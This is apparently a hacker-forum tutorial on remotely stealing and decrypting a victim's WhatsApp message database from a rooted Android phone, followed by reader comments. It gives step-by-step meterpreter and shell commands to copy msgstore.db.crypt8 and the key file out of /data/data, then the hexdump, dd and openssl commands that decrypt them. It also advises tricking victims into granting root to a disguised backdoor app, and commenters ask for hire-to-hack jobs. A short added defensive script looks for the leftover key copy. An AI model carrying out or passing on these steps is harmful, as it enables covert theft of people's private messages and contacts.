How To: Hack and Decrypt WhatsApp Database (Remotely) [ROOT]

Hello my fellow hackers, it's been a while since my last post. I can't find the time for posts nowadays, but I can manage to tend to comments.

Welcome to my 9th post. This tutorial explains how to extract and decrypt the WhatsApp database from the victim's Android system.

Yes, the device has to be rooted; there is no way around that when doing this remotely. I have been getting PMs about this and can't simply answer with the word SPOOF.

WhatsApp?

Almost everyone knows about it. It is a social Android application that enables the user to send free messages over the internet within seconds. The developers have had huge success and use high-level, complex algorithms to encrypt and store the data, which change with every update! Hence everyone uses it to send even the most personal messages, because they know it's safe.

But is it?

Yes, it is actually very safe. However, if the victim is a fool or gullible, he/she is the main vulnerability here. I see many 'experienced users' root their Android to explore or push the system to its maximum limits. Following in their footsteps, 'inexperienced users' also root/brick their Android just to accomplish a minor task. They don't even care about the cons.

Anyway, let's execute the hack:

Step 1: Exploit and Gain Access to the Android!

This is the easy part, which you all like and are used to.

Follow this guide to gain access to the rooted Android.

Once at the meterpreter prompt, type check_root to make sure the device is rooted.

What Do We Require?

To decrypt the database we obviously need the database itself, plus a key file in the /data folder, a location that requires root to access. We cannot decrypt the database without the key (unless you want to spend more than 100 years, even with a mainframe!).

Step 2: Let's Begin the Extraction Process for Database:

In meterpreter type:

  • cd /
  • cd /sdcard/WhatsApp
  • ls (List the contents of the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)

So, the database has been downloaded; now we need the 'Key of Decryption'.
(The key file that holds the encryption keys cannot be retrieved any more unless your phone is rooted.)

Step 3: Drop into the Shell:

As told before, but adding a little more detail here:

To decrypt the crypt8 files, we will need the key file. The key file stores two sets of decryption keys: the actual encryption key, K, and an initialisation vector called IV. WhatsApp stores the key file in a secure location.

To extract the key file, type:

  • shell
  • su (For Super User access or simply escalating privileges)

Here comes the tricky part: if the target is experienced and skilled, he must have installed the SuperSU application.

The application is responsible for holding the permissions that decide which applications can have root access. It even holds all the logs.

So, we need to convince the victim that the application is for boosting (or any other reason) his/her Android system but at the same time requires root access to reach its maximum potential. Here is an excellent tutorial by bart that shows how to disguise a back-door application.

(---------------"Victim, opens SuperSU and gives the permission"---------------)

There are some cases with inexperienced and unskilled users:

  • They don't have a SuperSU application installed.
  • They have not changed the setting for newly installed apps to PROMPT instead of GRANT.

So in these cases we are really lucky!

Let's continue:
(If the Android is not rooted you can navigate, but not copy or list the directory.)

  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download

(This copies the file 'key' to the /sdcard/Download folder.)

Terminate the shell:
^C (Control+C)

The key has been extracted from /data to /sdcard successfully!

Step 4: Again to Meterpreter:

Let's download the extracted key file to our root directory as we did for the encrypted database. Type:

  • cd /
  • cd /sdcard/Download
  • download key
  • rm key (Make sure you do that to delete the key file)

The Key has been extracted to our root directory successfully!

Step 5: DECRYPT THE DATABASE!

Now that we have the database and the key, we can easily decrypt it with one of the two methods:

#1 With Simple Linux Commands:

With the two necessities in the root directory, open a terminal and type:
(Copy and paste the commands one at a time; don't make a script out of them, or it will not work.)

  • hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
  • hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
  • dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
  • gzip -cdq msgstore.gz > msgstore.db

If you know even a little bash, you can easily understand these commands. (Source: here)

If the 4th command does not work, follow:

  • hexdump -e '2/1 "%02x"' key | cut -b 253-316

(Copy the printed text)

  • hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134

(Copy the printed text)

  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (Paste text from 1st command) -iv (Paste text from 2nd command) > msgstore.gz

These commands have bugs/errors in the result, so I would highly recommend going for method #2.

#2 With Simple Windows WhatsApp Viewer Application:

The application, available from GitHub, has an excellent interface. Download it from there.

Also, copy the key and database to Windows; I hope you know how to do that.

  • Open the application (in Windows of course).
  • Click File, then on 'Decrypt .crypt8'
  • In the dialogue box that appears, provide the Key file and Database.
  • Click OK, you will see that a 'msgstore.decrypted' file has appeared on your desktop.
  • Open it using the same application, go to 'File' then 'Open'.
  • Provide the Decrypted file, leave the Account name blank and for the 'wa.db', you can hack the phone again to extract this .db, to resolve contact names as mentioned in the cropped screenshot below.
  • Click 'OK'

And 'Boom', all the contacts with all their chats, even the latest ones, await your click.

The Tutorial Ends:

Now that you know how dangerous Rooting actually is, please, beware.

A cracker can not only perform this simple hack, he can even extract all the Wi-Fi passwords stored in your android, he can access everything, things that even you don't have access to!! He may spread to your PC once you connect your android, hack your accounts (saved passwords) and even frame you. You just become a mere pawn to his further plans.

So, think twice before rooting, and be really careful while holding a rooted Android in your hands.
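
If you want to check your own rooted device, the copy of the key made in Step 3 is the one artifact this procedure places on shared storage. The script below is an added example, not part of the original tutorial: it converts the `cut -b` hex columns from method #1 into byte offsets, which shows the key file must be at least 158 bytes, and lists files named `key` of that size under a directory you pass in. The function names and the name-plus-size heuristic are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original tutorial. Function names are hypothetical.

# The tutorial's hexdump format prints two hex characters per byte, so a
# `cut -b FIRST-LAST` column range maps to a byte offset and a length.
# Prints "OFFSET LENGTH" (offset is zero-based).
#   key file,  cut -b 253-316 -> "126 32": 32 bytes, an AES-256 key
#   crypt8,    cut -b 103-134 -> "51 16":  16 bytes, the IV, ending exactly
#                                at byte 67, the header that dd strips off
hex_cols_to_bytes() {
    echo "$(( ($1 - 1) / 2 )) $(( ($2 - $1 + 1) / 2 ))"
}

# Smallest file that can hold the range read by `cut -b 253-316`.
key_min_bytes() {
    hex_cols_to_bytes 253 316 | {
        read -r off len
        echo "$(( $off + $len ))"
    }
}

# List regular files named "key" under ROOT that are large enough to be a
# copy of the WhatsApp key file. ROOT is a shared-storage path such as
# /sdcard, or a directory holding a copy of it.
find_staged_keys() {
    min=$(key_min_bytes)
    find "$1" -type f -name key -size "+$(( $min - 1 ))c" 2>/dev/null | sort
}

# Usage: sh find_staged_keys.sh /sdcard
if [ "$#" -ge 1 ]; then
    find_staged_keys "$1"
fi
```

Step 4 deletes the staged copy with `rm key`, so a hit means the file was caught in between or the cleanup was skipped; an empty result does not show that the key was never copied.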

Thank You!
F.3.A.R.

29 Comments

Good to see you're back!

-Phoenix750

Hi...I am new in Kali Linux..
I don't speak English..
sorry..
but..
In my Kali Linux when " shell..cd /data/data......ls...operation failed access denied...
help..plz..
I have the install SuperSU???
I don't understand..please help me..

Could you please specify a bit more??? It could be because you haven't created the TCP listener.

Yeah, me too!

Hi fear
Am new to hacking , pls can i be ur student for a little while to learn some stuff?

Hello

i have a lot of jobs to hack whatsapp can you get me privately

Excellent tutorial, I was looking into this a few weeks ago as well. (Also thanks for the kind words :) )

Thank You Bart,

I got stuck after decompiling the malicious apk (to change the name and icon), then your tutorial showed me another way about it.

So yes, it was truly amazing. :)

Awesome, FEAR!
I'm looking forward to more android hacking!

Thank You Cameron!
The pace of the development in android hacking is very slow, while androids are spreading faster than computers.
So, I will try to keep the spirits up.

Just a few days ago, I was wondering what encryption those files were using. Great article, F.E.A.R

This means that the victim's phone should be rooted to extract the WhatsApp database?

Yes, that's what the tutorial explains all the time.

Are you saying I have to get physical access to their phone first?

No, if you follow this tutorial.

What type if you want to upload a picture of the victim

Using the upload command, but why would you want to do that? Did you mean download?

yes i meant download

Simply use the download command, Eg:
download acb.png
download a/b/c/xyz.jpeg

Do I have to tell the victim to actually install the apk and tell him to open it when I hit exploit? It's kinda impossible for the victim not to suspect then...

I'm not a hacker, but I am concerned that someone may have hacked my WhatsApp. Is it possible that someone living thousands of miles away (has no access to my networks, wifi or phone) may be able to hack my WhatsApp in real time? Also, can a person intercept my Skype calls or IMs even if they are not a contact of mine? Please enlighten me.

I'm getting an error while trying to download msgstore.db.crypt8

  • stdapi_fs_stat: operation failed: 1

Can anybody help me?

which phone is the targeted phone? I did not understand.

Can you contact me please? It is impossible to send you a private message.

Just an enquiry..

There's an easy way instead of decoding that file...I can download it, paste it on my phone, and create a new whatsapp with any phone number and use it as a backup so I can read them clearly. Am I right?
